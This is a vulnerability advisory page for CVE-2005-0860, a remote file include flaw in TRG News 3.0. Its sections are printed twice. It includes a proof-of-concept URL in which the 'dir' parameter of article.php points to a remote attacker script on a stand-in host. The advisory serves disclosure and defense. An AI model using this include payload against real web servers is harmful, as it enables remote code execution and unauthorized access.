TRG News Script Remote File Include Vulnerability
BID:12855
Info
TRG News Script Remote File Include Vulnerability
| Bugtraq ID: | 12855 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0860 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 21 2005 12:00AM |
| Updated: | Jul 12 2009 10:56AM |
| Credit: | Frank_Reiner <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: |
The Rusted Gate TRG News 3.0 |
| Not Vulnerable: | |
Discussion
TRG News Script Remote File Include Vulnerability
A remote file include vulnerability affects TRG News. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality.
Remote attackers could potentially exploit this issue to include a remote, malicious PHP script. Execution of remote scripts would take place in the context of the Web server hosting the vulnerable application. This will facilitate unauthorized access.
A remote file include vulnerability affects TRG News. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality.
Remote attackers could potentially exploit this issue to include a remote, malicious PHP script. Execution of remote scripts would take place in the context of the Web server hosting the vulnerable application. This will facilitate unauthorized access.
Exploit / POC
TRG News Script Remote File Include Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/trg_news30/trgnews/install/article.php?dir=http://www.example.org/attackerScript.php
No exploit is required to leverage this issue. The following proof of concept has been provided:
http://www.example.com/trg_news30/trgnews/install/article.php?dir=http://www.example.org/attackerScript.php
Solution / Fix
TRG News Script Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.